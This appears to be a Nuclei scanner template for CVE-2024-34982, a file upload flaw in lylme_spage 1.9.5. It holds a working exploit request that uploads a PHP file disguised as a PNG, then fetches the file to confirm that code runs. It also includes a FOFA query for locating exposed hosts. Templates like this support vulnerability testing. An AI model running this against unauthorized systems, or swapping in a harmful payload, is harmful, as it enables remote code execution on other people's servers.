77 lines
2.1 KiB
YAML
77 lines
2.1 KiB
YAML
id: CVE-2024-34982
|
|
|
|
info:
|
|
name: LyLme-Spage - Arbitary File Upload
|
|
author: DhiyaneshDk
|
|
severity: high
|
|
description: |
|
|
An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.
|
|
reference:
|
|
- https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md
|
|
- https://github.com/tanjiti/sec_profile
|
|
- https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: icon_hash="-282504889"
|
|
product: lylme_spage
|
|
vendor: lylme
|
|
tags: cve,cve2024,lylme-spage,rce,intrusive
|
|
|
|
classification:
|
|
cpe: cpe:2.3:a:lylme:lylme_spage:*:*:*:*:*:*:*:*
|
|
flow: http(1) && http(2)
|
|
|
|
variables:
|
|
string: "{{randstr}}"
|
|
filename: "{{to_lower(rand_text_alpha(5))}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /include/file.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=---------------------------575673989461736
|
|
|
|
-----------------------------575673989461736
|
|
Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
|
|
Content-Type: image/png
|
|
|
|
<?php echo "{{string}}";unlink(__FILE__);?>
|
|
-----------------------------575673989461736--
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '"code":'
|
|
- '"msg":'
|
|
- 'php"}'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: path
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- '"url":"([/a-z_0-9.]+)"'
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
GET {{path}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body, "{{string}}" )'
|
|
- 'contains(header, "text/html")'
|
|
condition: and
|
|
# digest: 4a0a004730450220440784f1e1d309bfb1eee99fbcaf02afe7bfa185b48f07233df0f14cac9e9d9b0221009072b53098bb58d0d3efd14db1a3fc5f7b0b4593a0426fa060db0c42edd6f029:922c64590222798bb761d5b6d8e72950
|